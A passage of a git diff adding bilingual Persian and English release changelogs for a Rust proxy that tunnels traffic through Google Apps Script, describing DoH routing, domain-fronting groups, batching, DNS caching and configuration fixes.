+• bypass DoH endpoints from Apps Script tunnel ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377)، PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) از @dazzling-no-more): قبلاً در Full mode هر DNS-over-HTTPS lookup browser از طریق Apps Script tunnel می‌رفت — `chrome.cloudflare-dns.com:443`، `dns.google:443` و سایر هزینه ~۲ ثانیه UrlFetchApp roundtrip به ازای هر name داشتن. ولی DoH از قبل encrypted هست + tunnel privacy اضافه‌ای نمی‌ده — فقط fact-of-DoH رو از local network مخفی می‌کنه که ناچیزه. حالا `bypass_doh_hosts` config (default true) routes DoH lookups مستقیم via TCP/443. لیست کامل bypass شامل: Cloudflare (incl. chrome./mozilla./1dot1dot1dot1.)، Google، Quad9، AdGuard، NextDNS، OpenDNS، CleanBrowsing، dns.sb، dns0.eu، AliDNS، doh.pub، Mullvad. کاربران می‌توانند با `tunnel_doh: true` در config opt-out کنن یا با `bypass_doh_hosts: ["custom1.com", "custom2.com"]` لیست رو extend کنن
+• H1 container keepalive (~۲۴۰s) برای جلوگیری از Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): Apps Script container‌ها بعد از ~۵ دقیقه idle cold می‌شن + ۱-۳ ثانیه به wake-up زمان می‌برن. این به‌خصوص در YouTube playback بعد از pause طولانی stall به‌وضوح دیده می‌شد. با ping HEAD به example.com هر ۲۴۰ ثانیه از طریق relay، container warm نگه داشته می‌شه. cache + inflight coalescer bypass شده تا ping واقعاً به Apps Script برسه. در google_only mode غیرفعال
+• 431 Request Header Fields Too Large به‌جای drop سکوتی (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): قبلاً اگر header block > ۱ MB می‌شد، socket drop می‌شد + browser silently retry می‌کرد + loop ابدی. حالا cap به ۶۴ KB کاهش یافته (match upstream Python) + explicit `HTTP/1.1 431 Request Header Fields Too Large` response برمی‌گرده + close می‌شه. browser ارور رو ببینه + loop رو نمی‌سازه
+• پیام error config port-collision واضح‌تر شد (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): قبلاً پیام cryptic بود. حالا: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` — کاربر مستقیم می‌فهمه چی fix بکنه
+---
+• Optional spreadsheet-backed response cache in `Code.gs` to reduce UrlFetchApp quota consumption ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400), PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) by @euvel): public GET requests with `Cache-Control` headers can now be served from a Google Sheet instead of round-tripping through `UrlFetchApp`. Cache hit costs ~5-20ms (Sheet read) vs ~250-500ms (UrlFetchApp). Features: TTL-aware caching (respects `max-age`, `no-cache`, `no-store`, `private`), 35 KB body-size gate (under the Sheets cell limit), header rewriting (Date/Age/Cache-Control/X-Cache/X-Cached-At), circular buffer for O(1) writes, Vary-aware compound keys (Accept-Encoding + Accept-Language). Opt-in via a single `CACHE_SPREADSHEET_ID` constant — default off, zero overhead for users who don't want it. Setup: create a new Google Sheet, paste its ID into `CACHE_SPREADSHEET_ID`, redeploy as new version. Run `getCacheStats()` from the Apps Script editor to see hit/miss/eviction counts.
+• Bypass Apps Script tunnel for DoH endpoints on TCP/443 ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377), PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) by @dazzling-no-more): previously every browser DNS-over-HTTPS lookup in Full mode rode through the Apps Script tunnel — `chrome.cloudflare-dns.com:443`, `dns.google:443`, etc. each paid the ~2-second UrlFetchApp round-trip per name. But DoH is already encrypted at the transport layer; tunneling it adds no real privacy (only hiding fact-of-DoH from the local network, which is marginal). Now `bypass_doh_hosts` config (default `true`) routes known DoH hosts around the tunnel via plain TCP. Built-in list: Cloudflare (incl. `chrome.`/`mozilla.`/`1dot1dot1dot1.` browser-pinned variants), Google, Quad9, AdGuard, NextDNS, OpenDNS, CleanBrowsing, dns.sb, dns0.eu, AliDNS, doh.pub, Mullvad. Users can opt out with `tunnel_doh: true` or extend the list with `bypass_doh_hosts: ["custom1.com", "custom2.com"]`. Gated to TCP/443 only — private DoH endpoints on `:8443` should use `passthrough_hosts` instead. ProxyServer warns at startup if `tunnel_doh: true` is paired with non-empty `bypass_doh_hosts` (the otherwise-silent inert combo). 6 unit tests for `matches_doh_host` covering exact match, case insensitivity, trailing dots, suffix tenant subdomains, user extras extending the default list, and the asymmetric-matching footgun guard.
+• H1 container keepalive (~240s) to prevent Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): Apps Script V8 containers go cold after ~5 minutes idle and cost 1-3s to wake. Most visible as YouTube player stalls after a quiet pause. Now sends a `HEAD http://example.com/` ping every 240s through the relay to keep the container warm. Bypasses the response cache and inflight coalescer (otherwise the second iteration would just hit the cache and never reach Apps Script). Skipped in `google_only` mode. The `JoinHandle` is captured so shutdown's `select!` arm can abort it cleanly — without that, hitting Stop in the UI would leave the keepalive holding an `Arc<DomainFronter>` on stale config (same class of bug as #99 hit for accept loops).
+• 431 Request Header Fields Too Large instead of silent drop (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): previously header blocks larger than 1 MB were silently dropped at the socket level, causing browsers to retry on connection-reset and loop indefinitely on the same oversized request. Now the cap is tightened to 64 KB (matching upstream Python's `MAX_HEADER_BYTES`) and oversized requests get an explicit `HTTP/1.1 431 Request Header Fields Too Large` reply followed by close. Both the plaintext HTTP frontend and the MITM HTTPS relay path now do this. Browsers see the error and don't loop.
+• Clearer port-collision error message (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): the same-port validation already existed; only the message was vague. Now reads: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` matching upstream Python's clarity.
diff --git a/docs/changelog/v1.8.4.md b/docs/changelog/v1.8.4.md
new file mode 100644
index 00000000..11e479a1
--- /dev/null
+++ b/docs/changelog/v1.8.4.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **adaptive batch coalescing** برای کاهش تعداد Apps Script roundtrip‌ها (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) از @yyoyoian-pixel): قبلاً هر op فقط ۸ms برای op‌های هم‌زمان دیگر صبر می‌کرد + اکثراً batchها فقط ۱ op داشتن. حالا scheme adaptive: اولین op یک timer ۴۰ms استارت می‌زنه، op‌های جدید reset می‌کنن، اگر ۴۰ms idle شد batch fire می‌شه. cap نهایی ۱۰۰۰ms. نتیجه field test روی شبکه ایران: ops/batch از ۱.۰ به ۲-۳، P75 RTT از ۶.۲s به ۳.۰s، کاهش ~۵۰٪ Apps Script call. configurable از طریق `coalesce_step_ms` / `coalesce_max_ms` در config + در Android UI Advanced section با slider
+• **tunnel-node long-poll از ۵s به ۱۵s** برای پایداری Telegram + Google Push (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) از @yyoyoian-pixel): قبلاً connection‌های persistent (Telegram XMPP پورت ۵۲۲۲، Google Push پورت ۵۲۲۸) هر ۵ ثانیه empty-response برمی‌گرفتن + apps این رو instability تفسیر می‌کردن + session reconnect می‌زدن. هر reconnect معادل یک TLS handshake کامل (~۴s از طریق Apps Script) یعنی buffering قابل مشاهده در تماس Telegram یا playback. حالا long-poll تا ۱۵ ثانیه باز می‌مونه + persistent connection پایدار می‌مونه
+• **adaptive straggler settle** در tunnel-node (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): قبلاً fixed ۳۰ms wait بعد از اولین session که data داشت. حالا adaptive ۴۰ms-step تا ۵۰۰ms-max که زود break می‌شه اگر همه session‌ها ready باشن. در شبکه‌های latency بالا (~۱.۵s Apps Script overhead) packing بیشتر session response در یک batch، quota مصرف کم‌تری ایجاد می‌کنه
+---
+• **Adaptive batch coalescing** to reduce Apps Script round-trip count (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) by @yyoyoian-pixel): the previous fixed 8ms coalesce window barely caught concurrent ops — most batches were a single op. The new adaptive scheme starts a 40ms timer on first arrival, resets on each new op, fires the batch when the window stays empty, with a hard 1000ms cap. Field testing on a network in Iran showed ops/batch went from ~1.0 to 2-3, P75 RTT 6.2s → 3.0s, fast (<3s) batches 61% → 74-85%, total Apps Script calls roughly halved. Both values configurable via `coalesce_step_ms` / `coalesce_max_ms` in `config.json` and via sliders in the Android UI's Advanced section. Desktop UI sliders are queued for the v1.8.x desktop UI batch alongside the system-proxy toggle (#432).
+• **tunnel-node long-poll raised from 5s to 15s** for persistent-connection stability (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) by @yyoyoian-pixel): at 5s long-poll, persistent connections like Telegram XMPP (`:5222`) and Google Push (`mtalk.google.com:5228`) interpreted the frequent empty-poll returns as connection instability and rotated sessions. Each reconnect cost a full TLS handshake (~4s through Apps Script), causing visible interruptions during Telegram video/voice calls and media playback. The 15s long-poll holds the response open until server data actually arrives, keeping persistent sessions alive without unnecessary re-handshakes.
+• **Adaptive straggler settle in tunnel-node** (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): the previous fixed 30ms straggler settle was too short to catch neighboring sessions with data. Replaced with adaptive 40ms-step / 500ms-max settle that breaks early when all sessions in a batch have data. On high-latency relays (~1.5s Apps Script overhead per call), packing more session responses into one batch saves quota; the early-break prevents wasted time when all data is already ready.
diff --git a/docs/changelog/v1.8.5.md b/docs/changelog/v1.8.5.md
new file mode 100644
index 00000000..eead68c8
--- /dev/null
+++ b/docs/changelog/v1.8.5.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• fix tunnel-node: cap هر TCP drain روی ۱۶ MiB تا batch response از سقف Apps Script (~۵۰ MiB) عبور نکنه ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) از @bankbunk): روی VPS های پر-bandwidth (۱ Gbps) reader task می‌تونه هزاران مگابایت رو در buffer per-session جمع کنه قبل از اینکه poll بعدی بیاد. قبلاً `drain_now` همه‌ی buffer رو در یک batch response می‌گرفت، base64 encoding (~۱.۳۳×) + JSON envelope اضافه می‌کرد، نتیجه از سقف ۵۰ MiB Apps Script رد می‌شد. Apps Script body رو wrap-around mid-base64 کوتاه می‌کرد + client side `serde_json` parse error با `EOF while parsing a string at line 1 column 52428685` می‌گرفت. برای استریم MP4 یا هر بایت‌سنگین upstream این bug stream رو مرتب کرش می‌داد. حالا `drain_now` حداکثر ۱۶ MiB در هر poll برمی‌گردونه + tail رو در buffer برای poll بعدی نگه می‌داره. eof تا finalize شدن buffer reported نمی‌شه که session بی‌موقع tear نشه. workaround قبلی @bankbunk (محدودکردن interface VPS با `wondershaper` به ۴۰ Mbps) دیگر لازم نیست — fix server-side پیاده شد و کاربران throughput عادی VPS رو خواهند داشت
+---
+• Fix tunnel-node: cap each TCP drain at 16 MiB so batch responses stay under Apps Script's ~50 MiB body ceiling ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) by @bankbunk): on high-bandwidth VPS (1 Gbps+), the reader task can stuff the per-session read buffer with tens of MiB between client polls. The old `drain_now` took the entire buffer in one shot, base64-encoded it (1.33× overhead), wrapped it in JSON, and the resulting body exceeded Apps Script's hard ~50 MiB Web App response limit. Apps Script truncated the body mid-base64; the client failed `serde_json` parse with `EOF while parsing a string at line 1 column 52428685` (= 50 MiB) and the stream tore. Most visibly, raw MP4 streams crashed minutes into playback. The fix splits oversized buffers: at most `TCP_DRAIN_MAX_BYTES` (16 MiB) is returned per drain, and the remainder stays in the buffer for the next poll. EOF is held back until the buffer is fully drained so partial drains don't prematurely close the session. Three regression tests cover the cap, the under-cap pass-through, and the EOF-holdback case (33 tunnel-node tests passing). @bankbunk's `wondershaper` workaround (rate-limiting the VPS interface to 40 Mbps) is no longer necessary — high-bandwidth VPS users can let throughput run at line rate again.
diff --git a/docs/changelog/v1.9.0.md b/docs/changelog/v1.9.0.md
new file mode 100644
index 00000000..2017b788
--- /dev/null
+++ b/docs/changelog/v1.9.0.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **شکستگی سازگاری minor: نام‌گذاری `mode = "google_only"` به `mode = "direct"` تغییر کرد** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more): نام قدیمی توصیف وضعیت رو بعد از اضافه شدن fronting_groups (که فراتر از Google می‌رسه) درست نمی‌داد. در Rust + Android + UI dropdown همه به `direct` تغییر کرده‌اند، ولی **`google_only` به‌عنوان alias deprecated در parser قابل قبول مونده** — config‌ها و saved settings قدیمی نمی‌شکنن. در Save بعدی، on-disk file خودکار به `direct` migrate می‌شه. در docs (README EN/FA, SF_README EN/FA, tunnel-node FA) note "تا قبل v1.9 نام `google_only` بود — هنوز کار می‌کنه" گذاشته شده برای کاربرانی که از راهنماهای قدیمی یا پست‌های Telegram قدیمی استفاده می‌کنن.
+• fronting_groups: domain fronting چند-edge برای CDN غیر-Google (Vercel، Fastly، …) (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more، با credit به [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) برای technique اصلی): فیلد جدید config `fronting_groups: [{name, ip, sni, domains}]`. هر group شامل (edge IP، front SNI، domain‌های member). وقتی CONNECT به یکی از domain‌های member می‌رسه، proxy MITM می‌کنه + upstream با `ip` به‌عنوان TCP destination + `sni` به‌عنوان TLS SNI re-encrypt می‌کنه — همان trick که برای `google_ip` + `front_domain` می‌کنیم، حالا قابل تنظیم برای هر CDN multi-tenant. بر روی Google fronting (built-in) برتری داره؛ زیر `passthrough_hosts` و DoH bypass قرار داره. در `mode = full` غیر فعال (که end-to-end TLS رو حفظ می‌کنه + MITM نمی‌کنه). config مثال: `config.fronting-groups.example.json`. doc کامل: `docs/fronting-groups.md` شامل recipe انتخاب `(ip, sni)`، routing precedence، و warning صریح ⚠️ درباره cross-tenant Host-header leak failure mode (هرگز domain‌هایی که واقعاً روی edge نیستند رو list نکنید). reviews folded: SNI اعتبار رستورد روی config-load gate، `Vec<Arc<>>` به‌جای clone-on-match، byte-level dot-anchored matcher، startup warnings برای inert combos.
+• edge-cache DNS در CodeFull.gs برای skip کردن round-trip tunnel-node (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) از @dazzling-no-more): `udp_open` ops با port=53 در `_doTunnelBatch` intercept می‌شن + از `CacheService` (cache hit) یا DoH (cache miss) سرو می‌شن. cache hit‌ها latency typical first-hop DNS رو از ~۶۰۰-۱۲۰۰ms به ~۲۰۰-۴۰۰ms پایین می‌آرن. تغییر pure server-side در CodeFull.gs (فقط Full mode — apps_script mode UDP path نداره). بدون تغییر Rust/client. DoH fallback chain: Cloudflare → Google → Quad9 روی RFC 8484 GET. cache key per-qtype برای جلوگیری از A/AAAA collision. TTL clamping در `[30s, 6h]`. NXDOMAIN/SERVFAIL با ۴۵s negative cache. NODATA-with-SOA بر اساس RFC 2308 §5 SOA TTL رو honor می‌کنه. default-on، opt-out با `ENABLE_EDGE_DNS_CACHE`. هر failure mode به path forward موجود tunnel-node fallback می‌کنه (zero regression). انتخاب CacheService بر روی Sheets به دلیل سرعت (~۱۰ms) + privacy (volatile، روی Drive log persist نمی‌کنه — برای کاربران در صحنه‌های censorship مهمه). ۱۱ تست pure-JS pass.
+• default `tunnel_doh: true` (flipped از `false` در v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): default قبلی (DoH bypass فعال) برای کاربران ایرانی بدون نشان دادن چیزی شکست می‌خورد چون Iran ISP direct connection به `dns.google`، `chrome.cloudflare-dns.com` و سایر pinned DoH hosts رو filter می‌کنن — همان hosts که bypass در حال route مستقیم می‌فرستاد. در نتیجه، DNS lookup‌ها fail می‌گرفتن + browsing شکست می‌خورد. حالا default safe است (DoH داخل tunnel نگه داشته می‌شه، در یک شبکه فیلتر شده کار می‌کنه). کاربری روی شبکه‌هایی که direct DoH کار می‌کنه (non-Iran)، می‌تونه `tunnel_doh: false` در config بگذاره برای latency win. تغییر backwards-compatible برای configs موجود — همه‌ی configs دارای فیلد explicit `tunnel_doh` رفتار حفظ می‌شن.
+• اشتراک‌گذاری Hotspot iOS/laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) از @yyoyoian-pixel): default `listen_host` از `127.0.0.1` به `0.0.0.0` تغییر کرده. این workflow معمول رو enable می‌کنه — یک phone Android که tunnel run می‌کنه، iPhone یا laptop روی همان hotspot WiFi می‌تونه از proxy استفاده کنه. configs قدیمی با explicit `listen_host: "127.0.0.1"` honor می‌شن (بازنویسی نمی‌شن).
+---
+• **Minor breaking: `mode = "google_only"` renamed to `mode = "direct"`** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more): the old name no longer described the mode now that `fronting_groups` reaches more than Google. Rust + Android + UI dropdown all updated, but **`google_only` is preserved as a deprecated alias on parse** — existing configs and saved settings don't break. On the next Save, the on-disk file migrates automatically to `direct`. Docs (README EN+FA, SF_README EN+FA, tunnel-node FA) carry a "was named `google_only` before v1.9 — old name still works" note so users following older guides / Telegram posts find their way.
+• `fronting_groups`: multi-edge domain fronting for non-Google CDNs (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more, credit to [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) for the original technique): new config field `fronting_groups: [{name, ip, sni, domains}]`. Each group is `(edge IP, front SNI, member domains)`: when a CONNECT to one of the member domains arrives, the proxy MITMs at the local CA, then re-encrypts upstream against `ip` with `sni` as the TLS SNI — same trick we already do for `google_ip` + `front_domain`, now configurable for any multi-tenant CDN edge (Vercel, Fastly, etc.). Wins over the built-in Google SNI-rewrite suffix list; loses to `passthrough_hosts` and DoH bypass. Skipped in `mode = full` (which preserves end-to-end TLS and can't MITM). Working example at `config.fronting-groups.example.json`. Full doc at `docs/fronting-groups.md` including the recipe for picking `(ip, sni)`, routing precedence, and an explicit ⚠️ warning about the cross-tenant Host-header leak failure mode (don't list domains that aren't actually on the edge). Review fixes folded: SNI validated via rustls at config-load gate; `Vec<Arc<>>` refcount on per-CONNECT match; byte-level dot-anchored matcher (no per-match `format!()`); startup warnings for inert combos.
+• Edge-cache DNS in `CodeFull.gs` to skip the tunnel-node round-trip (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) by @dazzling-no-more): intercepts `udp_open` / port=53 ops in `_doTunnelBatch` and serves them from `CacheService` (cache hit) or DoH (cache miss). Cache hits drop typical first-hop DNS latency from ~600-1200ms to ~200-400ms. Pure server-side change in `CodeFull.gs` (Full mode only — apps_script mode has no UDP path); zero Rust/client changes. DoH fallback chain: Cloudflare → Google → Quad9 over RFC 8484 GET. Per-qtype cache key keeps A and AAAA from colliding. Min RR TTL clamped to `[30s, 6h]`; NXDOMAIN/SERVFAIL get a 45s negative cache; NODATA-with-SOA honors the SOA TTL per RFC 2308 §5. Default-on, opt-out via `ENABLE_EDGE_DNS_CACHE`. Every failure mode (parse error, resolver outage, key-too-long, `cache.put` rejection) falls through to the existing tunnel-node forward path — zero regression on any failure. CacheService chosen over Sheets (#443's pattern) because Sheets reads/writes are 100-500ms per op (often slower than the DoH lookup we'd be caching), have a daily-quota hazard, and persist a Drive-listed log of every domain users resolve — a real privacy regression for users in censorship contexts. CacheService is ~10ms, volatile, free, no on-disk artifact. 11 pure-JS tests covering parsers, txid non-mutation, TTL clamp, NXDOMAIN-with-SOA TTL extraction, malformed/truncated input rejection, splice correctness for mixed batches.
+• Default `tunnel_doh: true` (flipped from `false` in v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): the previous default (DoH bypass active) silently broke for Iranian users because Iran ISPs filter direct connections to `dns.google`, `chrome.cloudflare-dns.com`, and other pinned DoH hosts — exactly the hosts the bypass was routing direct. DNS resolution failed and browsing broke. The safer default keeps DoH inside the tunnel; users on networks where direct DoH works can opt back into the bypass with `tunnel_doh: false`. Backwards-compatible for existing configs — anyone who explicitly set `tunnel_doh` keeps their behavior. Iranian users on pre-v1.8.6 versions hitting this regression should upgrade.
+• Hotspot sharing for iOS / laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) by @yyoyoian-pixel): default `listen_host` changed from `127.0.0.1` to `0.0.0.0`. Enables the common workflow where an Android phone runs the tunnel and an iPhone/iPad/laptop on the same hotspot uses it as a proxy (HTTP `192.168.43.1:8080` or SOCKS5 `:1081`). For full device-wide coverage on iOS, Shadowrocket or Potatso create a local VPN that routes all traffic through the SOCKS5 on the Android phone. Old configs with explicit `"listen_host": "127.0.0.1"` are honored (not overwritten).
diff --git a/docs/changelog/v1.9.1.md b/docs/changelog/v1.9.1.md
new file mode 100644
index 00000000..675d549c
--- /dev/null
+++ b/docs/changelog/v1.9.1.md
@@ -0,0 +1,10 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• tunable کردن آستانه auto-blacklist با ۳ field config جدید: `auto_blacklist_strikes` (default 3)، `auto_blacklist_window_secs` (default 30)، `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): تا قبل، threshold روی ۳ timeout در ۳۰ ثانیه = ۱۲۰ ثانیه cooldown hard-coded بود. کاربران single-deployment گزارش دادن این threshold روی شبکه‌های flaky too aggressive هست — یک cold-start stall + دو network blip → فقط deployment آن‌ها lockout می‌شه. حالا قابل تنظیم: single-deployment users می‌تونن `auto_blacklist_strikes: 5` یا `auto_blacklist_cooldown_secs: 30` بزارن. کاربران multi-deployment با ۱۰+ alternatives می‌تونن `auto_blacklist_strikes: 2` بزارن برای fail-fast. defaults رفتار قدیمی رو حفظ می‌کنن — هیچ کاربری چیزی notice نمی‌کنه مگر در config صریح override کنه. کاربر در UI form expose نشده — power-user file edit در config.json. clamp [1, 86400] برای جلوگیری از مقادیر غیرمعقول.
+• `request_timeout_secs` config (default 30) برای تنظیم batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430)، masterking32 PR #25): تا قبل `BATCH_TIMEOUT = 30s` hard-coded. شبکه‌های Iran ISP slow ممکنه `45` یا `60` بخوان تا Apps Script پیغام ارسال کنه past throttle window. شبکه‌های با fail-fast preference ممکنه `15` بخوان برای retry سریع‌تر هنگام hang. clamp [5s, 300s]. برای کاربر در UI form expose نشده.
+• warning روشن‌تر در tunnel-node startup برای recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): چندین قدیمی copy-paste guide از `MHRV_AUTH_KEY` به‌جای `TUNNEL_AUTH_KEY` در docker run استفاده می‌کرد. tunnel-node اون env var رو هرگز نمی‌خوند + silently default `changeme` رو fallback می‌کرد، که باعث AUTH_KEY-mismatch decoy می‌شد در client. حالا اگر `MHRV_AUTH_KEY` set باشه ولی `TUNNEL_AUTH_KEY` نباشه، tunnel-node پیغام specific می‌ده: "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY=...". این به کاربر مستقیم کمک می‌کنه به‌جای ساعت‌ها debug.
+• run.bat fallback به CLI بعد از UI failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417)، [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426)، [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): قبلاً وقتی هر دو UI renderer (glow + wgpu) fail می‌گرفتن (روی ماشین‌های قدیمی Windows / RDP / VM بدون GPU)، script پیغام "open issue" می‌داد + exit. حالا بعد از پیغام error، CLI `mhrv-rs.exe` رو خود اجرا می‌کنه + کاربر می‌تونه به استفاده از proxy ادامه دهد. CLI همان full functionality رو داره بدون UI shell — proxy روی `127.0.0.1:8085` (HTTP) و `127.0.0.1:8086` (SOCKS5).
+---
+• Tunable auto-blacklist threshold via three new config fields: `auto_blacklist_strikes` (default 3), `auto_blacklist_window_secs` (default 30), `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): previously hard-coded at "3 timeouts in 30s = 120s cooldown". Single-deployment users reported this threshold was too aggressive on flaky networks — one cold-start stall plus two transient network blips would lock them out of their only relay path. Now tunable: single-deployment users can set `auto_blacklist_strikes: 5` or `auto_blacklist_cooldown_secs: 30` to be more forgiving. Multi-deployment users with 10+ healthy alternatives can set `auto_blacklist_strikes: 2` to fail-fast. Defaults preserve existing behavior — no user notices a change unless they explicitly tune in `config.json`. Not exposed in the UI form yet — power-user file edit. Clamped to [1, 86400] for the duration fields to prevent absurd values.
+• `request_timeout_secs` config field (default 30) to tune the batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430), masterking32 PR #25): previously the hard-coded `BATCH_TIMEOUT = 30s` constant. Slow Iran ISP networks may want `45` or `60` to give Apps Script time to respond past throttle windows. Networks preferring fail-fast may want `15` to retry sooner when a deployment hangs. Clamped to [5s, 300s] (anything beyond exceeds Apps Script's 6-min hard cap with no benefit). Not in the UI form.
+• Clearer tunnel-node startup warning for the recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): several older copy-paste guides used `MHRV_AUTH_KEY` instead of `TUNNEL_AUTH_KEY` in `docker run`. tunnel-node never read that env var and silently fell back to default `changeme`, producing baffling AUTH_KEY-mismatch decoys on the client. Now if `MHRV_AUTH_KEY` is set but `TUNNEL_AUTH_KEY` is not, tunnel-node emits a specific warning: `"MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY=<your-secret>"`. Saves users hours of debugging the wrong layer.
+• `run.bat` falls back to CLI after UI renderer failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417), [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426), [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): when both UI renderers (glow + wgpu) fail on older Windows machines, RDP sessions, or VMs without GPU acceleration, the script previously printed an "open an issue on GitHub" message and exited. Now it prints the diagnostic info AND launches `mhrv-rs.exe` (CLI) so the user can keep using the proxy without the UI shell. CLI has the same proxy functionality on `127.0.0.1:8085` (HTTP) and `127.0.0.1:8086` (SOCKS5); only the visual UI is missing.
diff --git a/docs/changelog/v1.9.10.md b/docs/changelog/v1.9.10.md
new file mode 100644
index 00000000..d9d55d6b
--- /dev/null
+++ b/docs/changelog/v1.9.10.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• exit-node docs بازنویسی شد به‌صورت platform-agnostic. اسکریپت TypeScript حالا `assets/exit_node/exit_node.ts` نام داره (قبلاً `valtown.ts`) و راهنماها روی Deno Deploy / fly.io / VPS شخصی به‌عنوان host‌های توصیه‌شده تمرکز می‌کنن. کد TypeScript خود بدون تغییر است — همان web-standard `Request` / `Response` / `fetch` API که روی هر runtime serverless اجرا می‌شه. کاربرانی که قبلاً exit-node را روی پلتفرم انتخابی خود deploy کرده‌اند نیازی به تغییر ندارند.
+• Telegram channel announcements حالا brief English bullets می‌گیرن به‌جای Persian کامل (commit `9580ce8`). subscriber‌ها در یک نگاه می‌بینن چی ship شده — full Persian + English changelog همچنان در `docs/changelog/v*.md` برای archive باقی می‌مونه.
+• تست: ۱۷۹ lib + ۳۵ tunnel-node test همه pass.
+---
+• Rewrote the exit-node docs to be platform-agnostic. The TypeScript handler is now named `assets/exit_node/exit_node.ts` (was `valtown.ts`) and the setup guide focuses on Deno Deploy / fly.io / your own VPS as the recommended hosts. The TypeScript itself is unchanged — same web-standard `Request` / `Response` / `fetch` API that runs on any serverless runtime. Users who already have an exit node deployed on whichever host they picked don't need to change anything.
+• Telegram channel announcements now use brief English bullets instead of full Persian (commit `9580ce8`). Subscribers see what shipped at a glance — the full Persian + English changelog stays in `docs/changelog/v*.md` for archival.
+• Tests: 179 lib + 35 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.11.md b/docs/changelog/v1.9.11.md
new file mode 100644
index 00000000..88d2cb09
--- /dev/null
+++ b/docs/changelog/v1.9.11.md
@@ -0,0 +1,18 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
